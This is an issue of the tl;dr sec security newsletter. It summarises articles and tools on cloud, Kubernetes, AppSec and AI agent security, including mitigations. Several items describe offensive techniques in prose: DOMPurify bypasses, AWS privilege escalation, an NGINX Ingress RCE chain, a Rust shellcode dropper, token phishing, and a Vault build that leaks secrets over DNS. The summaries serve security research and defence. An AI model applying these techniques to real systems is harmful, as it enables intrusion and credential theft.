[tl;dr sec] #272 – AI Agent Security, Kubernetes Security, ‘State of CloudSec’ Reports: Insights or Self-Owns?

Hey there,

I hope you’ve been doing well!

🥳 BSidesSF and RSA 2025


BSidesSF and RSA are coming up, which means… it’s time to get spammed by vendors.

I mean… hear about how an old company is now AI-first.

Errr I mean meet cool people and make new friends 😃 

I’m hoping there will be some great new marketing highlights, like last year’s guy hawking a security product while balancing on a board on a cylinder while in a straitjacket, choreographed ninjas dancing, or Keanu Reeves repping a product.

Don’t let me down marketing budgets 🤞 

Parties
I’m looking forward to Semgrep’s pre-BSidesSF party on Friday April 25 with Code Red, ProjectDiscovery, and Prophet Security at Emporium Arcade Bar. Hope to see you there!

You can see other Semgrep RSA events here, including my bud Tanya Janca doing signings of her new book Alice & Bob Learn Secure Coding.

See also this mega RSAC 2025 Party List or this Event Google Sheet by Chenxi Wang.

Sponsor

📣 The Battle against Bots:

How to protect your AI app


Modern bots are smarter than ever—executing JavaScript, storing cookies, rotating IPs, and even cracking CAPTCHAs with AI. As attacks grow more sophisticated, traditional detection just isn’t enough.

Enter WorkOS Radar—your all-in-one bot defense solution. With just a single API, you can instantly secure your signup flow against brute force attacks, leaked credentials, and disposable emails. Stop bots in their tracks and keep your real users safe.

👉 Protect Your App with WorkOS Radar 👈

Bots are ever evolving, so it’s nice to have a single mechanism to reduce risk from a broad variety of types of attacks 👍️ 

AppSec


secureCodeBox/secureCodeBox
An OWASP project by iteratec. A Kubernetes-based, modular toolchain that automates continuous security scans for software projects, integrating >15 OSS security tools.

Fun with Timing Attacks
Robbie Ostrow describes a practical timing attack against a function that takes user input and checks if it matches a secret using startsWith, exploiting early-exit behavior in the string comparison. He discusses an optimized guessing technique using Thompson Sampling and a Trie data structure, and provides an interactive demo using a web worker in your browser.

Exploring the DOMPurify library: Bypasses and Fixes
Kevin Mizu describes multiple DOMPurify bypasses, leveraging techniques like node flattening, HTML parsing states, and DOM clobbering. If you haven’t already heard of it, DOMPurify is a hardened client-side HTML sanitizer by cure53 that is generally excellent and widely recommended.

💡 This post contains some serious deep HTML nuance wizardry. Wow.

Sponsor

📣 Permiso Security’s CISO Guide to Detecting and Preventing Identity Attacks


This CISO guide addresses the key questions:

  • How much visibility does the security team have into human and non-human identity-related activities and potential threats within your organization?

  • What do cloud identity attacks look like across different cloud environments, and how do they differ from traditional on-premise identity attacks?

  • What best practice strategies are available for detecting, preventing, and remediating identity-based attacks?

  • Plus many more.

👉 Download 👈

Identity is both critical and tricky, it’s great to see more guidance on getting visibility into identity-related risks and detection & response 👍️

Cloud Security


Understanding RCPs and SCPs in AWS: Choosing the Right Policy for your Security Needs
Fog Security’s Jason Kao discusses how to effectively combine Resource Control Policies (RCPs) and Service Control Policies (SCPs), including an example of how to migrate from an SCP to RCP. Recommendations: Use RCPs when you’re protecting resources in S3, STS, KMS, SQS, or Secrets Manager, are enforcing consistent security standards for resources, are running out of attachment room or space in SCPs, or you want to use NotResource in your policy. Use SCPs if you need to restrict a service not covered by RCPs or you want to use NotAction.

PowerUserAccess vs. AdministratorAccess from an attacker’s perspective
OffensAI’s Eduard Agavriloae describes how the AWS managed policy PowerUserAccess can be as dangerous as AdministratorAccess in complex AWS environments. For example, through PowerUserAccess, attackers can escalate privileges by modifying and invoking a Lambda function with inappropriate IAM permissions, using SSM SendCommand to exfiltrate access credentials from an EC2 instance with an overly permissive role, or altering a CloudFormation template with AdministratorAccess to include a privilege escalation vector.

State of ‘State of Cloud Security’ Reports: Insights or Self-Owns?
Rami McCarthy takes a critical look at “state of cloud security” reports published by CSPM vendors, highlighting how these reports may reflect more on the product’s effectiveness than the actual state of cloud security, and how certain stats might not represent real security risk or there may be a legit reason for the observed state. “Often, the statistics presented are as much a reflection of limitation in collected or analyzed data, or the product, as any specific research perspective.”

💡 I like this angle, and in general I think as an industry we should do a better job at critically analyzing “state of the union” type reports, evaluations/benchmarks, etc.

Beyond Configuration Perfection: Redefining ‘Cloud Security’
Vectra AI’s Kat Traxler argues that focusing on cloud misconfigurations and least-privilege access alone can cause security teams to underinvest in other important areas, like threat detection and incident response, security automation and orchestration, and governance and risk management.

She also makes good points about the potentially questionable reliability of industry reports and metrics (e.g. X% of orgs have <something risky>), because a) this is based on one vendor’s customers (which may not be representative of all companies), and b) the sample size/which customers are included may vary from year to year, so stats might naturally fluctuate.

Container Security


Secure your container images with signature verification
Datadog’s Bowen Chen discusses implementing container image signing and verification to protect against supply chain attacks. Bowen explains how Datadog uses a gRPC signing service, and verifies signatures within containerd using a custom plugin to avoid API server latency issues. The post also covers considerations for adopting image signing, including organizational fit and integration complexity. See also this CNCF 2024 talk: Image Signing and Runtime Verification at Scale: Datadog’s Journey.

Command and Kubectl: Kubernetes Security for Pentesters and Defenders
Awesome BSides Reykjavik 2025 talk by Chainguard’s Mark Manning, covering an intro to k8s security, attack scenarios (e.g. compromising an image registry credentials), useful tools, and defense and risk management.

Tools: go-pillage-registries, a pentester-focused Docker registry tool to enumerate and pull images, and vault-backdoored, a patched version of Vault that leaks all secrets via DNS.

IngressNightmare: 9.8 Critical Unauthenticated Remote Code Execution Vulnerabilities in Ingress NGINX
Wiz’s Nir Ohfeld, Ronen Shustin, Sagi Tzadik, and Hillai Ben-Sasson discovered multiple critical vulnerabilities in Ingress NGINX Controller for Kubernetes, allowing unauthenticated remote code execution and potential cluster takeover. They estimate ~40% of cloud environments are vulnerable.

The vulnerabilities stem from improper input sanitization, allowing attackers to inject arbitrary directives in the NGINX configurations, as well as gain RCE via uploading a malicious shared library using NGINX client body buffering and loading it via an injected ssl_engine directive during configuration testing.

💡 The exploit chain for configuration injection → RCE is pretty rad 🤘Wiz bringing that IDF/8200 energy.

Blue Team


Cryakl/Ultimate-RAT-Collection
Samples of 450+ classic/modern trojan builders, including screenshots.

thinkst/defending-off-the-land
Various scripts and tools from Thinkst’s Jacob Torrey and Marco Slaviero’s BlackHat EU 2024 talk for creating and deploying extent Windows OS features in non-traditional ways, including: an RDP Canarytoken, a WinRM Canarytoken, Scheduled Task alerter, AD login alerter, Windows Registry Monitor, Windows Service Canarytoken, and more.

ATT&CK Evaluations Library
MITRE‘s ATT&CK Evaluations Library is a collection of adversary emulation plans, each providing a comprehensive approach to emulating a specific threat actor (ALPHV BlackCat, CL0P, DPRK, FIN7, LockBit, Sandworm, …), from initial access through exfiltration.

Each plan contains an intelligence summary, an operational flow covering a high-level summary of the captured scenario(s), and step-by-step procedures in both human and machine-readable formats, allowing for end-to-end scenario execution or individual technique testing.

Red Team


Rust for Malware Development
Bishop Fox’s Nick Cerne discusses Rust and C for malware development, highlighting Rust’s advantage of being more difficult to reverse engineering given the current functionality of Ghidra. He then demonstrates how to build a Rust-based malware dropper that enumerates processes, injects shellcode using remote mapping injection, and executes a Sliver C2 payload in the context of notepad.exe.

Phishing for Refresh Tokens
Zolder’s Rik Van Duijn describes extending Wesley’s Attacker In the Middle (AITM) attack tool using Cloudflare Workers to steal OAuth 2.0 authorization codes and exchange them for access and refresh tokens, enabling pivoting to other Microsoft resources. GitHub link.

BitM Up! Session Stealing in Seconds Using the Browser-in-the-Middle Technique
Google’s Truman Brown et al give an overview of Browser in the Middle (BitM) attacks (serving a legitimate site through an attacker-controlled browser, making it challenging for victims to distinguish from the real site), which is an effective way to compromise sessions across various web applications, bypassing MFA. Unlike transparent proxies like Evilginx2 that require significant customization, BitM frameworks can target any website in seconds with minimal configuration.

Mitigations: requiring client certificates for authentication, or hardware-based MFA solutions like FIDO2 compatible security keys.

AI + Security


Quicklinks

nwiizo/tfmcp
By @nwiizo: A Terraform Model Context Protocol tool. An experimental CLI tool that enables AI assistants to manage and operate Terraform environments. It supports reading Terraform configurations, analyzing plans, applying configurations, and managing state with Claude Desktop integration.

AI Model Context Protocol (MCP) and Security
Cisco’s Omar Santos discusses the security implications of the Model Context Protocol (MCP), an open standard for connecting AI models to data sources and tools. Omar describes how security controls (e.g. authN/authZ, logging, …) can be added to the Agentic App <> MCP Server <> Tool flow.

The post includes some nice diagrams and tables covering key security considerations when implementing MCP transport mechanisms (authN/authZ, data security, network security), considerations when exposing tools (input validation, access control, error handling), and more.

AI agent authentication: it’s just OAuth
Maya Kaczorowski argues that existing OAuth standards are sufficient for authenticating and authorizing AI agents, entirely new solutions aren’t needed. OAuth provides a standardized way to delegate limited access to resources without sharing full credentials, and allows applications to request specific permissions on behalf of users, with those users explicitly approving what access they’re granting. Instead of giving an agent full access to an API, granular permission scopes in OAuth lets you grant specific read or write permissions to particular resources.

Building an Authorized RAG Chatbot with Oso Cloud
Oso’s Greg Sarjeant demonstrates how to build a permissions-aware RAG chatbot (GitHub repo) using Oso Cloud, Supabase, and OpenAI. The chatbot uses Oso Cloud to filter context based on user permissions before sending it to OpenAI, preventing unauthorized information disclosure.

See also here and Authorizing LLM responses by filtering vector embeddings.

Misc


✉️ Wrapping Up


Have questions, comments, or feedback? Just reply directly, I’d love to hear from you.

If you find this newsletter useful and know other people who would too, I’d really appreciate if you’d forward it to them 🙏

Thanks for reading!

Cheers,
Clint
@clintgibler

Read More

Scroll to Top